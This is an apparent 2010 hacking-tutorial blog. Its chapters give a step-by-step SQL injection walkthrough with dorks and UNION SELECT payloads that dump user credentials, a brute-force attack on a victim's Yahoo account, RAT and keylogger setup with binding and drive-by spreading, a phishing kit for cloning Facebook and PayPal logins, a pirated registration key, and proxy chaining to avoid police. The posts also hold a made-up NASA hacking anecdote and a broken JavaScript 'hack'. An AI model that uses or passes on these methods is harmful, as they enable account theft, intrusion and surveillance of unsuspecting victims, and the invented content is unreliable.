Sunday, November 21, 2010

Uptill now,we have seen few terms related to hacking and some methods to hack passwords like phishing,keyloggers etc. Now we are moving a little forward.Now in this thread i m going to post something about SQL INJECTION. Its a type of hacking with the help of which we can hack sites (mostly the newly born sites and educational sites )

ok buddiez lets start and kindly pay attention

let your mind think and its just a child play


1). Search for a vulnerable site.
=======================
Highlight one then press ctrl+c then ctrl+v at google search engine.

allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
…and this one is just priceless…
“login: *” “password= *” filetype:xls




2)Definitions:
==========

inurl: -> is a search parameter in google so that it searches for results in the site's url.
.php?5= -> is what i'm searching for in a url, SQL INJECTION works by adding a code after the = symbol. This is also commonly referred as a Dork.
Dork definition: It's the part in the site's url that tells you that it can be vulnerable to a certain SQL injection. Let's take this exploit for example:
We will check it's vulnerability by adding magic qoute (') at the end of the url.
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--


3) So the url will be like this:
======================

http://www.site.com/news_archive.php?id=5'
And we hit enter and we got this result.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
If you got an error, some text missing or a blank page the site is vulnerable but not at all.
Now we know that the site is vulnerable.



4) Find the columns :

===============

The next step is find out how many columns the database contain
To find it we use "order by" (without the qoute) and this string " -- " (no qoute).
It will look like this:
http://www.site.com/news_archive.php?id=6 order by 1-- (no error)
http://www.site.com/news_archive.php?id=6 order by 2-- (no error)
http://www.site.com/news_archive.php?id=6 order by 3-- (no error)
we move a little higher. (it doesn't matter)
http://www.site.com/news_archive.php?id=6 order by 10-- (no error)
http://www.site.com/news_archive.php?id=6 order by 14-- (no error)
until we got an error:
http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error)
now we got an error on this column:it will lok like this.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')
this mean the database contain only 14 columns


5)Union select :
===========

Now use "-" (negative quote) and union select statement.
using this we can select more data in one sql statement.
Look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--
we hit enter.
numbers appears..
Like this:
6
, 5
8


6) Check MYSQL Version
====================

Now we will check it's MYSQL VERSION. We will add @@version on the numbers appear on the previous step.
lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--
and you will get a result like this:
6
, 5
5.1.32 <--this is the version


7) Getting Table Name.
=================

We use group_concat(table_name).
replace @@version with group_concat(table_name)
and look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--
were not done already: (don't hit enter)
between number 14 and this "--" (quote) insert this:
+from+information_schema.tables+whe
re+table_schema=database()--
it will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--
we hit enter and got this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhoto,active_sessions_split,auth_u ser_md5


8) Column Name :
=============

Now we're done on TABLE NAME, we move on to COLUMN NAME.
use this string group_concat(column_name)
replace group_concat(table_name) to group_concat(column_name).
but before that we must choose one column. i choose auth_user_md5 because this is must or what we want.
for better result we need to hex auth_user_md5.
Go to this Link: http://home2.paulschou.net/tools/xlate/
p
aste auth_user_md5 to the text box and click encode.
now we get the hex of auth_user_md5: look like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35
before proceeding remove space between each numbers. like this: 617574685f757365725f6d6435
Now replace group_concat(table_name) to group_concat(column_name).
like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--
replace also +from+information_schema.tables+where+table_schema=database()--
to
+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--
(The yellow letter and numbers is the auth_user_md5 hex we encoded)
Note: always add 0x before the hex. Like above.
Here is the result:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--
Now hit enter: and you got result like this.
UserID,Username,Password,Perms,FirstName,MiddleName,LastName,Position,EmailAddre ss,ContactNumbers,DateCreated,CreatedBy,DateModified,ModifiedBy,Status


9) Main part :
===========

We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc..
Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,P
assword,0x3a,Perms,0x3a,FirstName,0x3a,M iddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0x3a ,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3aStatus)
but i prefer to do this one group_concat(Username,0x3a,Password) for less effort.
and replace also information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- to +from+auth_user_md5--
617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.
Result look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--
i hit enter we got this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d


10)Cracking the password :
=====================

Because the password is in md5 hash we need to crack it.
http://passcracking.com/index.php
pass
: x1R0zYB3bex

 
IF you have any problem.
===================
Ask here.
=======




۩ ۩..яєℓคтє∂ тσթเcร..۩ ۩
╚►Chapter 8 : Phishing ( The fake page )               
╚►Chapter 7 : Changing the ip address and bypassing the firewall
╚►Chapter 6 : Softwares and Cracking
╚►Chapter 5 : SEARCH ENGINE OPTIMIZATION
╚►Chapter 4 : Social Engineering
╚►Chapter 3 : Tracing IP address & Location of Person...
╚►Chapter 2 : EXPLOITING IP ADDRESS.
╚►Chapter 1 : A bit about Hackerz
╚►Chapter 0 : Introduction to Hacking
 

Friday, September 17, 2010

Hey guys ,

Herez a wonderful tutorial for all of you ...... Try it for sure ..... A great site to earn online money without any investment ..... First I wana tell u about the site :

Site Description :
============

http://www.earnmania.net.tc/

This site is working these days in PAKISTAN for online earning ..... Guys are earning thru this site .... what this site offers :


1) First you have to make an account on this site for Rs. 200/-
2) They give you an ID.
3) Now u have to invite friendz on this site using that ID .
4) For each referral ,u bring to the site , site will give u Rs. 100/-
5) You can bring unlimited referralz.
6) Now when ur referrals bring their friendz ,then site gives you Rs. 50/-

Suppose u bring A & B ,u will be awarded 200 , Now when A brings C and D u will be awarded Rs. 100 .

This is the actual scheme of this site ..... Now the hack ....

HACK :
=====

This site is actually of low budget ..... and is not maintained very well .... but working great ..... what u have to do is :

1) Open the site.
2) Goto REGISTER.
3) Fill all the info properly.
4) Dont write anything in INVITORS ID
5) Now in the MESSAGE BOCX, write the following javascript :

javascript:(function(200){(function(){var z=["Timeout","Interval"];for(var i=0;i<1;i++);

6) Click on SEND MESSAGE

You are DONE .....


now u dont have to pay them Rs.200/-
===========================

and ur page will be activated in just 15 minutes . Invite ur friendz and earn money.

Sunday, September 12, 2010

Couldn't post the chapter soon .... actually I was bzy in EID ..... :)

Anywayzzz its here guys ....

Here is a tutorial how to hack email ids thru brute force,its not so much efficient process because it takes a lot of time .... anyhow i thought to share it with u guys atleast it will give u some knowledge .... Follow these steps :





Procedure :
=========

1.Download Brute Force Software .

2.Excract on desktop and lets start/ ok run it

3.To hack email in target bar write:
pop.mail.yahoo.com

4.Type most be: POP3

5.Put connections to 60 and timeout to 60

6.Make sure you check a ''Single User''

7.Then when you check that to single user write in that bar you victims yahoo acc ID / explanation .. like googleboy@yahoo.com his ID will be googleboy .. write that

8.Password mod put on: ''Brute Force''

9.Then click ''Range''(a new window will pop up)

10. Then make sure you put ''Min Lenght'' 6 and ''Max Lenght'' to 16

11.Then put custom range .. there will be default Abcd.. etc and some numbers ..

12.Click OK


if u have any problem then ask here i will try to remove it

and as i have said earlier it takes a lot of time.it actually crack the password.
It really takes time ..... Its just like a cracker .... I think u have seen in movies to break the digital lock they try all the numbers quickly and the correct number opens it ........ just like that in brute force u have a list of passwords and the software try all these password line wise .... so it may take a lot of time for ur desired password to come


** If the password is alphanumeric then its almost impossible ...... 
 
۩ ۩..яєℓคтє∂ тσթเcร..۩ ۩
╚►Chapter 9 : Hack into Someone's PC using Keylogger
╚►Chapter 8 : Phishing ( The fake page )               
╚►Chapter 7 : Changing the ip address and bypassing the firewall
╚►Chapter 6 : Softwares and Cracking
╚►Chapter 5 : SEARCH ENGINE OPTIMIZATION
╚►Chapter 4 : Social Engineering
╚►Chapter 3 : Tracing IP address & Location of Person...
╚►Chapter 2 : EXPLOITING IP ADDRESS.
╚►Chapter 1 : A bit about Hackerz
╚►Chapter 0 : Introduction to Hacking
 
Chapter 10 : RATs (Hacking on Server's PC)
Introduction :
=========

A Remote Administration Tool (known more commonly on the Internet as a RAT) is used to remotely connect and manage a single or multiple computers with a variety of tools, such as:

* Screen/camera capture or control
* File management (download/upload/execute/etc.)
* Shell control (usually piped from command prompt)
* Computer control (power off/on/log off)


But this can also be misused. It is used only on one servers means you can use RAT on all the computers connected to your LAN system . Usually in schools/universities hostels where there is a net system using LAN .... You can use RAT there to hack the system of ur friend sitting in any other room .....



RAT Trojan Horses :
=============

Many trojans and backdoors now have remote administration capabilities allowing an individual to control the victim's computer. Many times a file called the server must be opened on the victim's computer before the trojan can have access to it. These are generally sent through email, P2P file sharing software, and in internet downloads. They are usually disguised as a legitimate program or file. Many server files will display a fake error message when opened, to make it seem like it didn't open. Some will also kill antivirus and firewall software. RAT trojans can generally do the following:

* Download, upload, delete, and rename files
* Format drives
* Open CD-ROM tray
* Drop viruses and worms
* Log keystrokes, keystroke capture software
* Hack passwords, credit card numbers
* Hijack homepage
* View screen
* View, kill, and start tasks in task manager
* Hide desktop icons, taskbar and files
* Print text
* Play sounds
* Randomly move and click mouse
* Record sound with a connected microphone
* Record video with a connected webcam

Some RAT trojans are pranks that are most likely being controlled by a friend or enemy on April Fool's day or a holiday. Prank RATS are generally not harmful, and won't log keystrokes or hack. They usually do disruptive things like flip the screen upside-down, open the CD-ROM tray, and swap mouse buttons. However, they can be quite hard to remove.



Popular RAT Software :
=================

* Shark
* Bifrost
* Bandook
* BO2K
* ProRAT
* SpyRAT
* HackRAT
* Netbos
* Optixe
* AutoSpY
* Nclear
* Amituer
* Bandk
* Yuri RAT
* Y3k RAT
* slha RAT
* Openx RAT
* Poison Ivy RAT
* Mosucker
* SubSeven RAT
* Nuclear RAT
* NetBus RAT
* ProRAT
* megapanzer
* LanHelper


But i suggest using optix pro

so a short tutorial on how to use optix for you guys..


How to use it ?
===========

So a short tutorial on how to use optix for you guys..


1) INTRO :
========


It isnt that hard to use.The Program used to build server files are :

.ClientClient.exe = Client
.BuilderBuilder.exe = Builder


WARNING: DO NOT RUN THE FILE(s) THAT YOU CREATE WITH BUILDER.EXE - THESE
FILES ARE THE ONES INTENDED TO RUN ON THE REMOTE COMPUTER THAT YOU WANT.TO REMOTELY ADMINISTRATE, NOT YOUR OWN!!!!


2) Quick Start Tutorial:
=================

1) Open Builder
2) Click"Build/Create Server:" button
3) Save Server as "server.exe"
4) Click UPX Packing
5) Click OK
6) Run Server.exe on the computer you wish to administrate (WARNING: NOT ON YOUR OWN COMPUTER!!!)
7) Open Client
8) Type in IP Address of other computer
9) Hit the Green Button in top-right hand corner to connect!

To find out exactly how to use a particular part of the program, simply
hover your mouse button over the face of a button, control etc. and a
"help hint" will appear instructing you as to the purpose of that
particular field/button etc.

UPX Packing is automated in the server build process if you wish to pack
your file!

to get an up-2-date copy of BlackFire's cgi logger (cgi notification)
go to:

http://www.bfndevelopment.com/

However a new logger (alternativecgilogger.zip) is also provided in
this version. Advanced users check it out!


3) FEATURE LIST :
===============

v1.33 - Client Side
COMPATIVBLE WITH ALL PAST SERVER VERSIONS! in a limited way! (own risk)
Client SOCKS 4/5 Support
Power Options - logoff,suspend,reboot,shutdown etc.
Server Information - Get info about builder settings
File Manager
Process Manager
Windows Manager
Registry Manager
FTP Manager
SOCKS 4/5 Server
Remote IP Scanner
Port Redirect
Application Redirect
Service Manager
Message Box
Matrix Chat (Client-2-vic)
Client-2-Client chat
Computer Information
Get Passwords - (RAS/Cached - 9x and AIM)
Online Key Logger - (now window titles)
Screen Capture with left click mouse manipulation
Keyboard Manipulation - (more advanced)
Cam Capture
SendKeys - old version of SendKeys for older servers
Humor normals - Flash keyboard lights, Monitor on/off, Disable keyboard/mouse etc.
Humor Screen Printer - print text to their screen!

v1.33 - Server Side
COMPATIBLE WITH ALL PREVIOUS CLIENT VERSIONS! in a limited way! (own risk)
Configurable:
Notification Information Separators
IP Address Separator
Info included in any Notification
Idenfitication Name
Server Port
Server Password
Fake Error
Server Icon
Registry Run startup
Registry RunServices startup
win.ini startup
system.ini startup
s7 special method startup!
Server File Name
Start Directory (windir/sysdir)
Melt Server
Unlimited ICQ Number Notification
Unlimited CGI Script Notification
Unlimited IRC Server/channel Notification
Unlimited PHP Script Notification
Unlimited SMTP Notification
Toggling killing of in-built exe/service list for firewalls
Toggling killing of in-built exe/service list for Anti-Virus
Toggling killing of in-built exe/service list for packages classifed as both anti-virus and firewall!
Unlimited Number of custom exe's to kill
Unlimited Number of custom services to kill
Easily Automated UPX Packing if needed.
Option for unpacked or packed server with your own packer if wanted (instructions clear)
 
Hope u like it
===========
Comments are welcome
==================
 
 
۩ ۩..яєℓคтє∂ тσթเcร..۩ ۩
╚►Chapter 9 : Hack into Someone's PC using Keylogger
╚►Chapter 8 : Phishing ( The fake page )               
╚►Chapter 7 : Changing the ip address and bypassing the firewall
╚►Chapter 6 : Softwares and Cracking
╚►Chapter 5 : SEARCH ENGINE OPTIMIZATION
╚►Chapter 4 : Social Engineering
╚►Chapter 3 : Tracing IP address & Location of Person...
╚►Chapter 2 : EXPLOITING IP ADDRESS.
╚►Chapter 1 : A bit about Hackerz
╚►Chapter 0 : Introduction to Hacking
 
 

Friday, September 3, 2010

Ardamax Keylogger
===============

Ardamax Keylogger 2.9 is good, but not as good as Ardamax Keylogger 2.8, reason being is because on Ardamax Keylogger 2.9, when your victim clicks the file, it comes up saying "This will install Ardamax monitoring tool, do you wish to continue?", where as if you use Ardamax 2.8, it will just infect they're PC when they click it, nothing comes up, it'll just auto-install.



A- Getting Ardamax and Registering it.
=============================

1. Get Ardamax 2.8 or 2.9 (I HIGHLY recommend 2.8):
Ardamax Keylogger 2.8- http://sharecash.org/download.php?file=1188259
Ardamax Keylogger 2.9- http://rapidshare.com/files/151005680/setup_akl2.zip.html


2. Once downloaded, you'll see a little note-pad icon in your desk-top icon bar thing (bottom right of your screen), now right-hand
click it and click 'Enter registration key...', now type in this where it says registration name and under it where it says
registration key:
Name: Membros
Key: CKPIUQDMITNVNRI
Once done click 'Ok' and you should get a pop-up saying 'Registration key accepted. Thanks for registering'





B- The Keylogger Engine.
===================

1. Now your going to make the Keylogger Engine (The thing you send out over msn or whatever). Click 'Remote Installation...', now,


click 'next' until you get to Appearences (it might come up straight away for Ardamax 2.9, but I can't be asked checking).


2. now your at Appearences, click 'Additional components:' and un-tick 'Log Viewer' then click 'Next'.


3. now you should be at 'Invisibility', make sure all the boxes are ticked, then click 'Next'.


4. Now you should be at 'Security', now, click 'Enable' and put your password (it can be any password you like, make it something easy


so you can remember). Once done, make sure all the boxes are ticked and click 'Next'.


5. Now you should be at 'Web Update', just click 'Next' when your here.


6. Ok, you should now be at 'Options', this all depends on you, if you want your Keylogger to be a secret on your computer so your


family know you ain't been up to anything naughty, then tick 'Start in hidden mode' and click 'Next'
(Remember, if in future you want to make a new Keylogger Engine, then press: CTRL + SHIFT + ALT + H at the same time.


7. Ok, now you should be at 'Control', click the box that says 'Send logs every', now make it so it sends logs every 30 minutes, then


where it says Delivery, un-tick 'Email' and tick 'FTP', leave the 'Include' bit as it is, now un-tick the box where it says 'Send only


if log size exceeds', once thats done,


8. Now you should be at 'FTP', ok, creat a free account at DriveHQ.com, then make sure your at 'Online Storage', then make a new
folder called: Logs
(this is where the logs are sent to when you keylogg someone)
Now on your FTP on Ardamax Keylogger, where it says 'FTP Host:', put this: http://ftp.drivehq.com/
Now where it says 'Remote Folder:', put this: Logs
Now where it says 'Userame:' and 'Password:', put your DriveHQ username and password
Once done, do NOT change your DriveHQ password or rename/delete the folder called 'Logs', if you do, the logs will not come through.


9. You should now be at 'Control', make sure all the boxes are 'ticked' then click 'Next'.


10. Where it says 'Screen Shots', adjust them as you like, but I recommend every 2 hours and full screen, once done click 'Next'.


11. Now you should be at 'Destination', now you have to choose where you put your Keylogger Engine, where it says 'Keylogger egine
path:', click 'browse' and choose where you want to put your Keylogger Engine (I suggest 'My Documents').
Now un-tick 'Open the folder containing the keylogger engine' (this should stop you from logging yourself) and then choose the Icon
you want for the keylogger engine, choose one and then click 'Next' then 'Finish'.
Watch the video on how to do all this here



C- Binding the Keylogger with another file.
================================

1. Download the Binding Tool:
Easy Binder 2.0----http://rapidshare.com/files/151005958/Easy_Binder.zip.html


2. Open it and then click the little green '+' image in the bottom left corner, then it should browse your files, go to 'My Documents'
(or where-ever you put the Keylogger Engine) and then click the file called 'Install'.


3. Do the same again but don't add the Keylogger Engine (Install), add a picture or something.


4. You need to get a .ico image, this is easy, just go to http://www.chami.com/html-kit/services/favicon/ and upload the Image you
want to be converted to .ico, once its done, click 'download'.


5. On the Binder, click 'Settings' and then where it says 'Select An Icon', click the '...' image and then browse your files, where it
says 'Files of type', scroll down and select 'All Files [*.*]', then select your .ico image which you just made like so;


6. Now on the Easy Binder, where it says 'Set Output File', click the '...' button and then put it where you want your binded files to
be saved (I recommend My Documents so you don't forget), put the name you want on the file and then click 'Save'.


Video link for this tutorial : http://www.youtube.com/watch?v=84qNWuICm5A



D- Spread Through HTML
====================

You can also spread it by HTML attck
the server file of your trojan you will have to upload it on some webhosting and then change the link of the server file in the code and then save this code as "index.html" and then upload it to the same host.


All done, now everytime someone opens that webpage they would be infected with your trojan's server


http://tinypaste.com/6b4b3


IF you have any problem.
===================
Ask here.
=======




۩ ۩..яєℓคтє∂ тσթเcร..۩ ۩

╚►Chapter 8 : Phishing ( The fake page )               
╚►Chapter 7 : Changing the ip address and bypassing the firewall
╚►Chapter 6 : Softwares and Cracking
╚►Chapter 5 : SEARCH ENGINE OPTIMIZATION
╚►Chapter 4 : Social Engineering
╚►Chapter 3 : Tracing IP address & Location of Person...
╚►Chapter 2 : EXPLOITING IP ADDRESS.
╚►Chapter 1 : A bit about Hackerz
╚►Chapter 0 : Introduction to Hacking

Wednesday, September 1, 2010

Hey guys now the real part starts .... means THE PRACTICAL HACKING ....
INTRO
======
First i wanna tell u what is phishing .... Suppose you want to hack the facebook account of anyone , then to hack account u make a fake page of facebook which looks like the original one but is attached to your site .... u send this page to your friend saying anything like "hey new version of facebook,check the hidden pics of girls " . Now he must try to login on it . once he typed his pass and click login,he will redirect to the original facebook and his id and pass which he typed on the fake page will come to your online account . He even doesnt know that he has been hacked . Enjoy it.




How to do phishing :
===============

How to create fake webpage in order 2 get da victim pass.

The Following File Includes Most Of The Famous Sites Fake Pages.First download it

eBay
Facebook
Gmail
Hi5
AIM
Hotmail
Yahoo
My Space
Paypal
FLV
Photo Bucket
Rapidshare
Runescape

http://rapidshare.com/files/225587482/fakes_badman.rar

INSTRUCTIONS:
=============

** Suppose you want to hack facebook account then open faceboook folder.Each Folder Contains 4 Files -

1) Index.html - clone of facebook login page

2) Run.php - processing php file joins 1 community and stores login details

3) One Gif image

4) ld.txt - where login details will be saved

** Now upload these three files (except image file ) to a free webhost site with PHP installed.

** Send the site link of index.html to the victim and when he login on it the password comes to Id.txt

Enjoy.

If you have any problem,ask here.
=========================
 
 

۩ ۩..яєℓคтє∂ тσթเcร..۩ ۩
╚►Chapter 9 : Hack into Someone's PC using Keylogger
╚►Chapter 8 : Phishing ( The fake page )               
╚►Chapter 7 : Changing the ip address and bypassing the firewall
╚►Chapter 6 : Softwares and Cracking
╚►Chapter 5 : SEARCH ENGINE OPTIMIZATION
╚►Chapter 4 : Social Engineering
╚►Chapter 3 : Tracing IP address & Location of Person...
╚►Chapter 2 : EXPLOITING IP ADDRESS.
╚►Chapter 1 : A bit about Hackerz
╚►Chapter 0 : Introduction to Hacking
Proxy is changing ur ip adress.dis chapter is totally related 2 changing ur ip address,changing ip address is very much imp. bcoz by doing it, we get many benefits.
[1st]we can download multiple files 4m rapidshare
[2]by dis we can bypass a firewall
[3] der r many sites vch allows only one account on 1 ip address,on dose sites we can make multiple ids by dis.
[4]4 being safe while doing cyber hackes,it is very much essential 2 do proxy.
[5]after of doing proxy,we can fool other person very easily.
learning proxy is very imp. bcoz while doing cyber hacks it makes u some safe .
let's start /

see,suppose dt u vant 2 propose a girl nd u r very much scared about her reaction then u simpally say ur any freind 2 tell her dt u like her,this is proxy,actually this is nt proxy bt it giveS a solid idea of proxy.
wenever u send some data 2 any web server then dt server watch ur ip adress,in proxy ,first we connect 2 any proxy server,nd now we do surfing,now supose dt u r sending some data 2 any server ,nw bcoz u hv done proxy ,ur data vl be sent via dt proxy server nd dt server where u r sending d data,dt server ud nt be able nw 2 trace u bcoz now dt server can watch dt proxy server ip.
lemme tel u something about working of proxy.
U------>SENDING DATA 2 GMAIL------->GMAIL REPLYING 2 U
AFTER OF DOING PROXY THIS THING LOOKS SOMETHING LIKE DIS
U---->PROXY SERVER--->GMAIL SERVER------>PROXY SRVER-->U

NW i think u hv got d idea of proxy,if still nt got then write in help desk,i vl clear u more.
after of doing proxy we found 1 thing dt our internet speed has gone very slow.itgoes 2 70%
nw a small real hacking story.
b4 of some months a 16 year old boy in u.s.a. did dos attack on nasa website.on dt moment nasa had sent his robote 2 mangal planet[sorry,i donno english of mangal planet anyway],d moment on vch he did dos attack on dt moment d robot of nasa ws steping on mangal planet,after dos attack dt robot just stopped nd just went 2 hang.robot stopped working.
nw all de nasa scientists started looking at each other face like a stupid,de were nt getting vat is dis going on?
nw de sTarted 2 search who has done it?nd after of 14 day they got d location of d boy nd went 2 his home nd caught.
nw d question rises up,y i hv written dis story here.?
actualy d boy has chnaged his ip address 4 times. i mean first he chaNged his ip address,then he did another proxy over of d first proxy then d 3rd then 4th the 5th,he did nt chANge his mac address.
all i want 2 tell u ,if u hv done proxy then the webmaster cann't trace u vdout going 2 d proxy server 2 vch u hv connected nd if u hv done proxy flooding 4 10times then be 100% assured no1is coming 2 catch u b4 of 1 month.if u hv done proxy 4 10 times then 4 tracing d fbi vl first go 2 d 10th proxy server 2 vch u hv connected thenwards 4m der he vl get 2 knw ur 9th server then wards they vl go 2 d 9th server then 2 8th nd thus continue.nd finaly in coming 2 u they vl take 1 month.itis nt possible 4 dem 2 trace u4m comuter.they must go personally 2 d proxy server nd all dis takes time.
i think u ppl got d importaince Of doing proxy.
anyway .let' mooov 2 learn hw 2 do proxy.
let's start.




First of al write in google"list of proxy address" or u may search 4 "free proxy server"
nw many links will come.go on any1 of them.
now on that website u vl find many ip address nd port no.s.
these r d adress of proxy servers.now copy any1 of de address.mind it,u hv 2 copy both d things,i mean port no. as well as ip address.
now open ur internet explorer nd go in
tools>internet option>connection>lan setting
go in lan setting,der u vl see 2 blue lines.one is AUTOMATIC CONFIGURATION ND d second one is PROXY SERVER
in proxy server named tab u vl see 4 blocks.2 for ticking nd 2 for giving address.tick both of dem boxes nd in address put d ip adress u copied nd in port no. put d port no. u copied.never forget 2 tick both d boxes .now click o.k.
nw open whatismyip.com
nd u vl see dt ur ip address has been chANged.
in mozilla firefox go here
tools>options>advanced>network>settings
nd in settings put d ip address nd port no.
dis is d same operation vch is carried out in all type of browser.
der r many softwares 4 dis purpose.all of dem r shit nd nothing else.
der is anonyomous proxy list verifier named software nd many more ,all of dem do d same work.i don think any1 should use dem.
u can do d above said work in a more simple way also.
simpally open http://www.proxy4free.com/named site.
der in most left side u vl see written "proxy list"
in proxy list der vl be many lists named list 1list 2 list 3 nd many more .simpally go on list 1 nd copy ip nd port no.l 4m der.
confused

come 2 d point vch u did nt get in my previous proxy named thread.
see,doing proxy makes u more safe while doing illlegal stuffs but d problem is how 2 do proxy flooding.
proxy flooding means connectiong 2 a proxy server then again connection 2 any other proxy server then again 2 ay other server.
if u vl do proxy flooding then u vl be very much safe /
i m telling u some software's name here 4m vchg u can do proxy flooding very easily but mind it i m nt going 2 give u all de software.some of dem i vl give u nd some of dem u hv 2 search on ur own bt d one vch i vl giv u ,vl be enough 2 do proxy flooding ..anyway.
name of tools 4 doing proxy floding-->
SocksChain,happy browser tool,multiproxy,tor
these are d tools 4 doing proxy flooding,wen u r doing something highly illegal then first of all use any1 of dese softwares nd nw do vatever u vanna do .now u r very much safe/
tool "multiproxy"is a very very very good tool.itensures u police vl nt come 2 u b4 of 1 month nd tor is also very very good./
get tor 4m here.
tor.eff.com
now some extra outstanding good stuffs lolz.
use a software named "brozar".it does nt leave any log wen u do illegal stuffs .a very god software 2 make u safe ,searching it is ur duty.
use a software named "torpark browser"it also do d same work of brozar.if u r using it then it makes u sure dt der is no log u r leaving on d internet.this is a perfect tool 2 make u very very much safe.download it 4m here.
torrify.com/index.php
i know i hv told here name of many tools but all u need 2 download onlu tor nd torpark browser.
4get all d other tools name.i hv given here links also ..simpally download nd be safe ...
freinds

doing proxy helps u in many ways.
on rapidshare u can't download more than 1 file on 1 time bt vd doing proxy u can download multiple files.
all d sites vch does nt offer u 2 make more than 1 account on ur computer vl allow u 2 make many1 after doing proxy,in colleges where orkut or other sites r blocked ,u can open all d restricted sites vd doing proxy .
well, if u r trying 2 bypass d firewalll of ur coolege nd u r using proxy then it makes ur internet speed very much slow.indt case use a software named "ultra surf"
u can get ultrasurf very easily on internet .simpally write in gogle"download ultra surf"nd u vl get it.after of downloading it ,alll u hv 2 do is 2 a double click on it,a lock sign vl apear nd now no firewall can stop u by doing browsing.inmany colleges they motherfucker bind d word proxy even nd der by doing proxy u cann't surf d way bt ultra surf is 100% unstopable4m al d firewalls nd it also gives u a very goodbrosing speed there4 bettter in college use ultra surf.

http://www.hidemyass.com/
http://www.anonymizer.com/
http://www.wujie.net/
http://www.ultrareach.net/
http://surfshield.net/

those are some of proxy sites tht will provide u with access to blocked websites


Summary of d chapter.

=================

[1]proxy is done 4 being safe while doing illegal stuffs nd 4 bypassing firewalls.itis a very good option 2 download multiple files 4m rapidshare at any single moment.
[2]get proxy server lists nd apply these address in ur browser 2 surf d web anonymously.
[3]use software "tor" 2 do proxy flooding
 
Proxy server are of four types:
=======================

1. Transparent Proxy
================
This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, not transparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.)

2. Anonymous Proxy
===============
This type of proxy server indentifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users.

3. Distorting Proxy
==============
This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers.

4. High Anonymity Proxy 
===================
This type of proxy server does not identify itself as a proxy server and does not make available the original


INSTRUCTIONS FOR CHANGING UR IP ADDRESS IN DIFFERENT EXPLORER :
 

Instructions for Internet Explorer 6.0

===========================

1. On the Tools menu in Internet Explorer, click Internet Options, click the Connections tab, and then click LAN Settings.
